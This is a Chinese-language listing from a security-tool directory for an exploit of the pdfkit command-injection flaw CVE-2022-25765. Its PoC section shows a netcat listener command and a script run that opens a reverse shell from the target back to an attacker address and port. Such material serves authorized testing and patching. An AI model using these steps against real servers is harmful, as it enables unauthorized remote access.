Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
PDFkit-CMD-Injection-CVE-2022-25765 — 针对 pdfkit < 0.8.6 中 CVE-2022-25765 命令注入漏洞的利用 | Kitploit
工具/GitHubGitHub/nikn0laty/pdfkit-cmd-injection-cve-2022-25765
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制
GitHubnikn0laty/pdfkit-cmd-injection-cve-2022-25765

PDFkit-CMD-Injection-CVE-2022-25765

针对 pdfkit < 0.8.6 中 CVE-2022-25765 命令注入漏洞的利用

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
1063年前尚未审核
分享

PDFkit-CMD-Injection (CVE-2022-25765)

针对 pdfkit < 0.8.6 中 CVE-2022-25765 命令注入漏洞的利用工具

关于该漏洞的更多详细信息,请参见此处

PoC

在您的主机上运行 netcat:

root@kitploit:~
$ nc -lvnp 1337

运行利用工具(示例):

root@kitploit:~
$ ./CVE-2022-25765.py -t http://localhost -a 10.10.14.122 -p 1337
[*] Input target address is http://localhost
[*] Input address for reverse connect is 10.10.14.122
[*] Input port is 1337
[!] Run the shell... Press Ctrl+C after successful connection

参数:

root@kitploit:~
-t, --target  Address of target in http-format
-a, --addr    Address for reverse connect
-p, --port    Port for reverse connect, 9001 by default       
下载工具